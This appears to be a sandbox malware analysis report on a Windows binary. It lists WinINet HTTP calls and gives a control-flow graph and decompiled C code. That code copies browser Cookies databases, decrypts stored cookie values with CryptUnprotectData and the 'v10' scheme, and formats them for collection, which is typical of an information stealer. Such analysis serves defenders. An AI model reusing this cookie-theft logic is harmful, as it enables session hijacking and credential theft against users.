                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00408312
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00408321
                                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,?,00000000,00000000,00409B89,00C00000,00000001), ref: 00408396
                                                                                                                                                                        • HttpSendRequestW.WININET(?,00000001,00000000), ref: 004083C2
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 004083ED
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004083F9
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00408400
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408422
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 0040845D
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040846E
                                                                                                                                                                        • LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408477
                                                                                                                                                                        • LocalFree.KERNELBASE(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040847E
                                                                                                                                                                        • LocalFree.KERNELBASE(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408487
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$AllocInternet$CloseHandle$ByteCharFileHttpMultiOptionRequestWide$DeleteOpenReadSendlstrcpyn
                                                                                                                                                                        • String ID: /$Pao$rqwrwqrqwrqw
                                                                                                                                                                        • API String ID: 3377237856-26002313
                                                                                                                                                                        • Opcode ID: aafd5879307a66afce12fd9e369e4241c6591ad45258ee02a5c42afa5d3d6cc8
                                                                                                                                                                        • Instruction ID: 6c99c45f28bfee67641de8d5d70fad00062f969ed25daf8f75b78222567e1072
                                                                                                                                                                        • Opcode Fuzzy Hash: aafd5879307a66afce12fd9e369e4241c6591ad45258ee02a5c42afa5d3d6cc8
                                                                                                                                                                        • Instruction Fuzzy Hash: 84029F71A00215AFDF04EFB6DE45E6E77B5FB88300F008839E915B7290DB78AD118B68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 716 402cb8-402d42 call 4017fa call 401934 725 402d44-402d47 LocalFree 716->725 726 402d4d-402d69 CryptUnprotectData 716->726 725->726 727 402d6b-402d7f call 40177f 726->727 728 402d8d-402d8f 726->728 727->728 735 402d81-402d87 StrCpyW 727->735 730 402d91-402d92 LocalFree 728->730 731 402d98-402d9c 728->731 730->731 733 402da7-402dab 731->733 734 402d9e-402da1 LocalFree 731->734 736 402db6-402dba 733->736 737 402dad-402db0 LocalFree 733->737 734->733 735->728 738 402dc5-402dc7 736->738 739 402dbc-402dbf LocalFree 736->739 737->736 740 402dd0-402df0 LocalAlloc 738->740 741 402dc9-402dca LocalFree 738->741 739->738 742 402df3-402e0b 740->742 741->740 744 402e11-402ed7 call 40a69e 742->744 745 402f3d-402f44 742->745 760 402ed9-402ee6 CopyFileW 744->760 761 402f2f-402f30 DeleteFileW 744->761 745->742 746 402f4a-402f4c 745->746 748 402f55-402f5b 746->748 749 402f4e-402f4f LocalFree 746->749 749->748 760->761 763 402ee8-402ef7 760->763 762 402f36-402f37 LocalFree 761->762 762->745 763->761 765 402ef9-402efc 763->765 765->761 766 402efe-402f1c 765->766 768 402f5c-402f66 766->768 769 402f1e-402f2e 766->769 772 402f6c 768->772 773 40320e-40322b DeleteFileW 768->773 769->761 775 402f6f-402fbe 772->775 773->745 780 403231 773->780 785 4031f2-4031ff 775->785 786 402fc4-402fc8 775->786 780->762 785->775 790 403205-40320b 785->790 787 402fd3-40301e 786->787 788 402fca-402fcd 786->788 787->785 796 403024-403065 787->796 788->785 788->787 790->773 800 4031eb-4031ec LocalFree 796->800 801 40306b-403097 796->801 800->785 804 40312d-40314f 801->804 805 40309d-4030c0 call 40177f 801->805 808 403155-4031b4 call 40a4c2 wsprintfW lstrlenW 804->808 809 4031da-4031df 804->809 816 4030c2-403110 wsprintfW lstrlenW 805->816 817 40311e-403122 805->817 822 4031c2-4031c6 808->822 823 4031b6-4031c0 call 40a503 808->823 813 4031e1-4031e2 LocalFree 809->813 814 4031e8 809->814 813->814 814->800 816->817 824 403112-403117 call 40a503 816->824 817->809 818 403128 817->818 819 4031d1-4031d4 LocalFree 818->819 819->809 822->819 826 4031c8-4031cb LocalFree 822->826 823->822 829 40311c 824->829 826->819 829->817
                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                        			E00402CB8(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				char _v13;
                                                                                                                                                                        				char _v14;
                                                                                                                                                                        				char _v15;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				WCHAR* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                        				WCHAR* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				void* _v60;
                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                        				char _v68;
                                                                                                                                                                        				intOrPtr* _v72;
                                                                                                                                                                        				void* _v76;
                                                                                                                                                                        				void* _v80;
                                                                                                                                                                        				char _v84;
                                                                                                                                                                        				void* _v88;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				void* _v96;
                                                                                                                                                                        				char _v100;
                                                                                                                                                                        				char* _v104;
                                                                                                                                                                        				char* _v108;
                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                        				char _v116;
                                                                                                                                                                        				void* _t135;
                                                                                                                                                                        				void* _t136;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t157;
                                                                                                                                                                        				intOrPtr _t159;
                                                                                                                                                                        				intOrPtr _t161;
                                                                                                                                                                        				intOrPtr _t163;
                                                                                                                                                                        				intOrPtr _t165;
                                                                                                                                                                        				intOrPtr _t167;
                                                                                                                                                                        				intOrPtr _t169;
                                                                                                                                                                        				void* _t172;
                                                                                                                                                                        				int _t176;
                                                                                                                                                                        				void* _t178;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				void* _t185;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				signed int _t190;
                                                                                                                                                                        				intOrPtr _t192;
                                                                                                                                                                        				intOrPtr _t193;
                                                                                                                                                                        				intOrPtr _t194;
                                                                                                                                                                        				intOrPtr _t195;
                                                                                                                                                                        				intOrPtr _t196;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				void* _t200;
                                                                                                                                                                        				WCHAR* _t204;
                                                                                                                                                                        				void* _t209;
                                                                                                                                                                        				void* _t212;
                                                                                                                                                                        				int _t215;
                                                                                                                                                                        				int _t226;
                                                                                                                                                                        				intOrPtr _t228;
                                                                                                                                                                        				void* _t236;
                                                                                                                                                                        				void* _t240;
                                                                                                                                                                        				WCHAR* _t241;
                                                                                                                                                                        				intOrPtr* _t242;
                                                                                                                                                                        				void* _t246;
                                                                                                                                                                        				void* _t288;
                                                                                                                                                                        				signed int _t289;
                                                                                                                                                                        				signed int _t290;
                                                                                                                                                                        				void* _t294;
                                                                                                                                                                        				void* _t295;
                                                                                                                                                                        				intOrPtr _t297;
                                                                                                                                                                        				void* _t302;
                                                                                                                                                                        				void* _t303;
                                                                                                                                                                        
                                                                                                                                                                        				_v60 = __edx;
                                                                                                                                                                        				_v72 = __ecx;
                                                                                                                                                                        				_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_t136 =  *((intOrPtr*)( *0x40e044))(0x40, 0x200);
                                                                                                                                                                        				_t288 = _t136;
                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                        				_v64 = _t288;
                                                                                                                                                                        				_t240 =  *((intOrPtr*)( *0x40e13c))(_a12);
                                                                                                                                                                        				E004017FA(_t240,  &_v12,  &_v68);
                                                                                                                                                                        				_t246 = _t135;
                                                                                                                                                                        				E00401934(_v12,  &_v64, _t246, _v68);
                                                                                                                                                                        				_v32 = _v32 & 0x00000000;
                                                                                                                                                                        				_v80 = _t288;
                                                                                                                                                                        				_v84 = 0x200;
                                                                                                                                                                        				_t294 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        				_v28 = _t294;
                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                        					LocalFree(_v12);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t250 =  *0x40e0b0;
                                                                                                                                                                        				_t147 =  *((intOrPtr*)( *0x40e0b0))( &_v84,  &_v32, 0, 0, 0, 0,  &_v92); // executed
                                                                                                                                                                        				if(_t147 != 0) {
                                                                                                                                                                        					_t236 = E0040177F(_v88,  &_v28, _v92);
                                                                                                                                                                        					_t294 = _v28;
                                                                                                                                                                        					_pop(_t250);
                                                                                                                                                                        					if(_t236 != 0) {
                                                                                                                                                                        						StrCpyW( *_v60, _t294);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t294 != 0) {
                                                                                                                                                                        					LocalFree(_t294);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v80 != 0) {
                                                                                                                                                                        					LocalFree(_v80);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v32 != 0) {
                                                                                                                                                                        					LocalFree(_v32);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v88 != 0) {
                                                                                                                                                                        					LocalFree(_v88);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t240 != 0) {
                                                                                                                                                                        					LocalFree(_t240);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t149 = LocalAlloc(0x40, 0x208); // executed
                                                                                                                                                                        				_t289 = 0;
                                                                                                                                                                        				_v108 = L"Network\\Cookies";
                                                                                                                                                                        				_t295 = _t149;
                                                                                                                                                                        				_v104 = L"Cookies";
                                                                                                                                                                        				_v64 = 0;
                                                                                                                                                                        				do {
                                                                                                                                                                        					_t295 =  *((intOrPtr*)( *0x40e000))(_t295, _a8,  *((intOrPtr*)(_t302 + _t289 * 4 - 0x68)));
                                                                                                                                                                        					_v76 = _t295;
                                                                                                                                                                        					if(_a16 == 0) {
                                                                                                                                                                        						goto L25;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t155 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1c4);
                                                                                                                                                                        					 *0x40e4d4 = _t155;
                                                                                                                                                                        					_t157 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1f8);
                                                                                                                                                                        					 *0x40e4c8 = _t157;
                                                                                                                                                                        					_t159 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e208);
                                                                                                                                                                        					 *0x40e4c4 = _t159;
                                                                                                                                                                        					_t161 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e230);
                                                                                                                                                                        					 *0x40e4cc = _t161;
                                                                                                                                                                        					_t163 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1e0);
                                                                                                                                                                        					 *0x40e4bc = _t163;
                                                                                                                                                                        					_t165 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1c0);
                                                                                                                                                                        					 *0x40e4b8 = _t165;
                                                                                                                                                                        					_t167 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e224);
                                                                                                                                                                        					 *0x40e4c0 = _t167;
                                                                                                                                                                        					_t169 =  *((intOrPtr*)( *0x40e0d4))(_a16,  *0x40e1b0);
                                                                                                                                                                        					 *0x40e4d0 = _t169;
                                                                                                                                                                        					_v36 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        					_t172 = E0040A69E(_t250,  &_v36);
                                                                                                                                                                        					_t241 = _v36;
                                                                                                                                                                        					if(_t172 == 0) {
                                                                                                                                                                        						L23:
                                                                                                                                                                        						DeleteFileW(_t241); // executed
                                                                                                                                                                        						L24:
                                                                                                                                                                        						LocalFree(_t241);
                                                                                                                                                                        						goto L25;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t176 = CopyFileW(_t295, _t241, 0); // executed
                                                                                                                                                                        					if(_t176 == 0) {
                                                                                                                                                                        						goto L23;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t178 =  *0x40e4c8( &_v28); // executed
                                                                                                                                                                        					_t250 = _t241;
                                                                                                                                                                        					if(_t178 == 0 && _v28 != _t178) {
                                                                                                                                                                        						_t180 =  *0x40e4d4(_v28,  *0x40e218, 0xffffffff,  &_v8, _t178); // executed
                                                                                                                                                                        						_t303 = _t303 + 0x14;
                                                                                                                                                                        						_push(_v8);
                                                                                                                                                                        						if(_t180 == 0) {
                                                                                                                                                                        							if( *0x40e4cc() != 0x64) {
                                                                                                                                                                        								L54:
                                                                                                                                                                        								 *0x40e4bc(_v8);
                                                                                                                                                                        								 *0x40e4c4(_v28); // executed
                                                                                                                                                                        								_pop(_t250);
                                                                                                                                                                        								DeleteFileW(_t241); // executed
                                                                                                                                                                        								if(_t241 == 0) {
                                                                                                                                                                        									goto L25;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L24;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t242 = _v72;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t185 =  *0x40e4c0(_v8, 0);
                                                                                                                                                                        								 *0x40e4c0(_v8, 1);
                                                                                                                                                                        								 *0x40e4c0(_v8, 2);
                                                                                                                                                                        								 *0x40e4c0(_v8, 3);
                                                                                                                                                                        								_t189 =  *0x40e4c0(_v8, 4);
                                                                                                                                                                        								_v60 = _t189;
                                                                                                                                                                        								_t190 =  *0x40e4c0(_v8, 5);
                                                                                                                                                                        								_t303 = _t303 + 0x30;
                                                                                                                                                                        								_t290 = _t190;
                                                                                                                                                                        								if(_t185 >= 1 && (_v60 >= 1 || _t290 >= 1)) {
                                                                                                                                                                        									_t192 =  *0x40e4b8(_v8, 0);
                                                                                                                                                                        									_v56 = _t192;
                                                                                                                                                                        									_t193 =  *0x40e4b8(_v8, 1);
                                                                                                                                                                        									_v52 = _t193;
                                                                                                                                                                        									_t194 =  *0x40e4b8(_v8, 2);
                                                                                                                                                                        									_v48 = _t194;
                                                                                                                                                                        									_t195 =  *0x40e4b8(_v8, 3);
                                                                                                                                                                        									_v44 = _t195;
                                                                                                                                                                        									_t196 =  *0x40e4b8(_v8, 4);
                                                                                                                                                                        									_t303 = _t303 + 0x28;
                                                                                                                                                                        									_v40 = _t196;
                                                                                                                                                                        									if(_t290 <= 0) {
                                                                                                                                                                        										goto L52;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t297 =  *0x40e4d0(_v8, 5);
                                                                                                                                                                        									_t80 = _t290 + 0x40; // 0x40
                                                                                                                                                                        									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, _t80);
                                                                                                                                                                        									_t200 =  *((intOrPtr*)( *0x40e050))(_t199, _t297);
                                                                                                                                                                        									_v60 = _t200;
                                                                                                                                                                        									_v16 =  *_t200;
                                                                                                                                                                        									_v15 =  *((intOrPtr*)(_t200 + 1));
                                                                                                                                                                        									_v14 =  *((intOrPtr*)(_t200 + 2));
                                                                                                                                                                        									_v13 = 0;
                                                                                                                                                                        									if(_t297 == 0) {
                                                                                                                                                                        										L51:
                                                                                                                                                                        										LocalFree(_t200);
                                                                                                                                                                        										goto L52;
                                                                                                                                                                        									}
                                                                                                                                                                        									_v12 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
                                                                                                                                                                        									_t204 =  *0x40e21c; // 0x6ede90
                                                                                                                                                                        									_v24 = _t204;
                                                                                                                                                                        									_push("v10");
                                                                                                                                                                        									_push( &_v16);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e084))() != 0) {
                                                                                                                                                                        										_push( &_v100);
                                                                                                                                                                        										_v112 = _t297;
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_push(0);
                                                                                                                                                                        										_v116 = 0x200;
                                                                                                                                                                        										_push( &_v116);
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e0b0))() == 0) {
                                                                                                                                                                        											L48:
                                                                                                                                                                        											_t209 = _v12;
                                                                                                                                                                        											if(_t209 != 0) {
                                                                                                                                                                        												LocalFree(_t209);
                                                                                                                                                                        											}
                                                                                                                                                                        											_t200 = _v60;
                                                                                                                                                                        											goto L51;
                                                                                                                                                                        										}
                                                                                                                                                                        										 *((char*)(_v100 + _v96)) = 0;
                                                                                                                                                                        										_t212 = E0040A4C2(_v96);
                                                                                                                                                                        										_v20 = _t212;
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e0a0))(_v48, "1", _v44, _v40, _t212);
                                                                                                                                                                        										_t269 =  !=  ? L"FALSE" : L"TRUE";
                                                                                                                                                                        										_t215 = wsprintfW(_v12, _v24, _v56, _v52,  !=  ? L"FALSE" : L"TRUE");
                                                                                                                                                                        										_t303 = _t303 + 0x20;
                                                                                                                                                                        										if(_t215 >= lstrlenW(_v24)) {
                                                                                                                                                                        											 *_t242 = E0040A503( *_t242, _v12);
                                                                                                                                                                        										}
                                                                                                                                                                        										if(_v96 != 0) {
                                                                                                                                                                        											LocalFree(_v96);
                                                                                                                                                                        										}
                                                                                                                                                                        										L47:
                                                                                                                                                                        										LocalFree(_v20);
                                                                                                                                                                        										goto L48;
                                                                                                                                                                        									}
                                                                                                                                                                        									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100 + _t290 * 4);
                                                                                                                                                                        									if(E0040177F(_t297,  &_v20, _t290) != 0) {
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e0a0))(_v48, "1");
                                                                                                                                                                        										_t275 =  !=  ? L"FALSE" : L"TRUE";
                                                                                                                                                                        										_t226 = wsprintfW(_v12, _v24, _v56, _v52,  !=  ? L"FALSE" : L"TRUE", _v44, _v40, _v20);
                                                                                                                                                                        										_t303 = _t303 + 0x20;
                                                                                                                                                                        										if(_t226 >= lstrlenW(_v24)) {
                                                                                                                                                                        											_t228 = E0040A503( *_t242, _v12); // executed
                                                                                                                                                                        											 *_t242 = _t228;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									if(_v20 == 0) {
                                                                                                                                                                        										goto L48;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										goto L47;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								L52:
                                                                                                                                                                        								_push(_v8);
                                                                                                                                                                        							} while ( *0x40e4cc() == 0x64);
                                                                                                                                                                        							_t241 = _v36;
                                                                                                                                                                        							_t295 = _v76;
                                                                                                                                                                        							_t289 = _v64;
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *0x40e4bc();
                                                                                                                                                                        						 *0x40e4c4(_v28);
                                                                                                                                                                        						_pop(_t250);
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L23;
                                                                                                                                                                        					L25:
                                                                                                                                                                        					_t289 = _t289 + 1;
                                                                                                                                                                        					_v64 = _t289;
                                                                                                                                                                        				} while (_t289 < 2);
                                                                                                                                                                        				if(_t295 != 0) {
                                                                                                                                                                        					LocalFree(_t295);
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}















































































                                                                                                                                                                        0x00402ccd
                                                                                                                                                                        0x00402cd0
                                                                                                                                                                        0x00402cd3
                                                                                                                                                                        0x00402ce4
                                                                                                                                                                        0x00402cef
                                                                                                                                                                        0x00402cf1
                                                                                                                                                                        0x00402cf6
                                                                                                                                                                        0x00402cfb
                                                                                                                                                                        0x00402d06
                                                                                                                                                                        0x00402d0b
                                                                                                                                                                        0x00402d16
                                                                                                                                                                        0x00402d20
                                                                                                                                                                        0x00402d2d
                                                                                                                                                                        0x00402d30
                                                                                                                                                                        0x00402d3d
                                                                                                                                                                        0x00402d3f
                                                                                                                                                                        0x00402d42
                                                                                                                                                                        0x00402d47
                                                                                                                                                                        0x00402d47
                                                                                                                                                                        0x00402d4d
                                                                                                                                                                        0x00402d65
                                                                                                                                                                        0x00402d69
                                                                                                                                                                        0x00402d74
                                                                                                                                                                        0x00402d79
                                                                                                                                                                        0x00402d7c
                                                                                                                                                                        0x00402d7f
                                                                                                                                                                        0x00402d87
                                                                                                                                                                        0x00402d87
                                                                                                                                                                        0x00402d7f
                                                                                                                                                                        0x00402d8f
                                                                                                                                                                        0x00402d92
                                                                                                                                                                        0x00402d92
                                                                                                                                                                        0x00402d9c
                                                                                                                                                                        0x00402da1
                                                                                                                                                                        0x00402da1
                                                                                                                                                                        0x00402dab
                                                                                                                                                                        0x00402db0
                                                                                                                                                                        0x00402db0
                                                                                                                                                                        0x00402dba
                                                                                                                                                                        0x00402dbf
                                                                                                                                                                        0x00402dbf
                                                                                                                                                                        0x00402dc7
                                                                                                                                                                        0x00402dca
                                                                                                                                                                        0x00402dca
                                                                                                                                                                        0x00402ddc
                                                                                                                                                                        0x00402dde
                                                                                                                                                                        0x00402de0
                                                                                                                                                                        0x00402de7
                                                                                                                                                                        0x00402de9
                                                                                                                                                                        0x00402df0
                                                                                                                                                                        0x00402df3
                                                                                                                                                                        0x00402e06
                                                                                                                                                                        0x00402e08
                                                                                                                                                                        0x00402e0b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402e1f
                                                                                                                                                                        0x00402e27
                                                                                                                                                                        0x00402e34
                                                                                                                                                                        0x00402e3c
                                                                                                                                                                        0x00402e49
                                                                                                                                                                        0x00402e51
                                                                                                                                                                        0x00402e5e
                                                                                                                                                                        0x00402e66
                                                                                                                                                                        0x00402e73
                                                                                                                                                                        0x00402e7b
                                                                                                                                                                        0x00402e88
                                                                                                                                                                        0x00402e90
                                                                                                                                                                        0x00402e9d
                                                                                                                                                                        0x00402ea5
                                                                                                                                                                        0x00402eb2
                                                                                                                                                                        0x00402eb9
                                                                                                                                                                        0x00402eca
                                                                                                                                                                        0x00402ecd
                                                                                                                                                                        0x00402ed2
                                                                                                                                                                        0x00402ed7
                                                                                                                                                                        0x00402f2f
                                                                                                                                                                        0x00402f30
                                                                                                                                                                        0x00402f36
                                                                                                                                                                        0x00402f37
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402f37
                                                                                                                                                                        0x00402ee2
                                                                                                                                                                        0x00402ee6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402eed
                                                                                                                                                                        0x00402ef4
                                                                                                                                                                        0x00402ef7
                                                                                                                                                                        0x00402f0e
                                                                                                                                                                        0x00402f14
                                                                                                                                                                        0x00402f17
                                                                                                                                                                        0x00402f1c
                                                                                                                                                                        0x00402f66
                                                                                                                                                                        0x0040320e
                                                                                                                                                                        0x00403211
                                                                                                                                                                        0x0040321a
                                                                                                                                                                        0x00403221
                                                                                                                                                                        0x00403223
                                                                                                                                                                        0x0040322b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403231
                                                                                                                                                                        0x00402f6c
                                                                                                                                                                        0x00402f6f
                                                                                                                                                                        0x00402f74
                                                                                                                                                                        0x00402f81
                                                                                                                                                                        0x00402f8c
                                                                                                                                                                        0x00402f97
                                                                                                                                                                        0x00402fa2
                                                                                                                                                                        0x00402fad
                                                                                                                                                                        0x00402fb0
                                                                                                                                                                        0x00402fb6
                                                                                                                                                                        0x00402fb9
                                                                                                                                                                        0x00402fbe
                                                                                                                                                                        0x00402fd8
                                                                                                                                                                        0x00402fe3
                                                                                                                                                                        0x00402fe6
                                                                                                                                                                        0x00402ff1
                                                                                                                                                                        0x00402ff4
                                                                                                                                                                        0x00402fff
                                                                                                                                                                        0x00403002
                                                                                                                                                                        0x0040300d
                                                                                                                                                                        0x00403010
                                                                                                                                                                        0x00403016
                                                                                                                                                                        0x00403019
                                                                                                                                                                        0x0040301e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403037
                                                                                                                                                                        0x00403039
                                                                                                                                                                        0x0040303f
                                                                                                                                                                        0x00403049
                                                                                                                                                                        0x0040304b
                                                                                                                                                                        0x00403050
                                                                                                                                                                        0x00403056
                                                                                                                                                                        0x0040305c
                                                                                                                                                                        0x0040305f
                                                                                                                                                                        0x00403065
                                                                                                                                                                        0x004031eb
                                                                                                                                                                        0x004031ec
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004031ec
                                                                                                                                                                        0x0040307f
                                                                                                                                                                        0x00403082
                                                                                                                                                                        0x00403087
                                                                                                                                                                        0x0040308d
                                                                                                                                                                        0x00403092
                                                                                                                                                                        0x00403097
                                                                                                                                                                        0x00403135
                                                                                                                                                                        0x00403138
                                                                                                                                                                        0x0040313b
                                                                                                                                                                        0x0040313c
                                                                                                                                                                        0x0040313d
                                                                                                                                                                        0x0040313e
                                                                                                                                                                        0x0040313f
                                                                                                                                                                        0x00403143
                                                                                                                                                                        0x0040314a
                                                                                                                                                                        0x0040314f
                                                                                                                                                                        0x004031da
                                                                                                                                                                        0x004031da
                                                                                                                                                                        0x004031df
                                                                                                                                                                        0x004031e2
                                                                                                                                                                        0x004031e2
                                                                                                                                                                        0x004031e8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004031e8
                                                                                                                                                                        0x0040315b
                                                                                                                                                                        0x0040315f
                                                                                                                                                                        0x0040317a
                                                                                                                                                                        0x00403188
                                                                                                                                                                        0x00403196
                                                                                                                                                                        0x004031a6
                                                                                                                                                                        0x004031a8
                                                                                                                                                                        0x004031b4
                                                                                                                                                                        0x004031c0
                                                                                                                                                                        0x004031c0
                                                                                                                                                                        0x004031c6
                                                                                                                                                                        0x004031cb
                                                                                                                                                                        0x004031cb
                                                                                                                                                                        0x004031d1
                                                                                                                                                                        0x004031d4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004031d4
                                                                                                                                                                        0x004030b3
                                                                                                                                                                        0x004030c0
                                                                                                                                                                        0x004030d5
                                                                                                                                                                        0x004030f2
                                                                                                                                                                        0x00403102
                                                                                                                                                                        0x00403104
                                                                                                                                                                        0x00403110
                                                                                                                                                                        0x00403117
                                                                                                                                                                        0x0040311c
                                                                                                                                                                        0x0040311c
                                                                                                                                                                        0x00403110
                                                                                                                                                                        0x00403122
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403128
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403128
                                                                                                                                                                        0x00403122
                                                                                                                                                                        0x004031f2
                                                                                                                                                                        0x004031f2
                                                                                                                                                                        0x004031fc
                                                                                                                                                                        0x00403205
                                                                                                                                                                        0x00403208
                                                                                                                                                                        0x0040320b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040320b
                                                                                                                                                                        0x00402f1e
                                                                                                                                                                        0x00402f27
                                                                                                                                                                        0x00402f2e
                                                                                                                                                                        0x00402f2e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402f3d
                                                                                                                                                                        0x00402f3d
                                                                                                                                                                        0x00402f3e
                                                                                                                                                                        0x00402f41
                                                                                                                                                                        0x00402f4c
                                                                                                                                                                        0x00402f4f
                                                                                                                                                                        0x00402f4f
                                                                                                                                                                        0x00402f5b

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402D47
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • CryptUnprotectData.CRYPT32(00000200,00000000,00000000,00000000,00000000,00000000,?), ref: 00402D65
                                                                                                                                                                        • StrCpyW.SHLWAPI(?,?), ref: 00402D87
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402D92
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DA1
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DB0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DBF
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402DCA
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000208), ref: 00402DDC
                                                                                                                                                                        • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00402EE2
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F30
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402F37
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402F4F
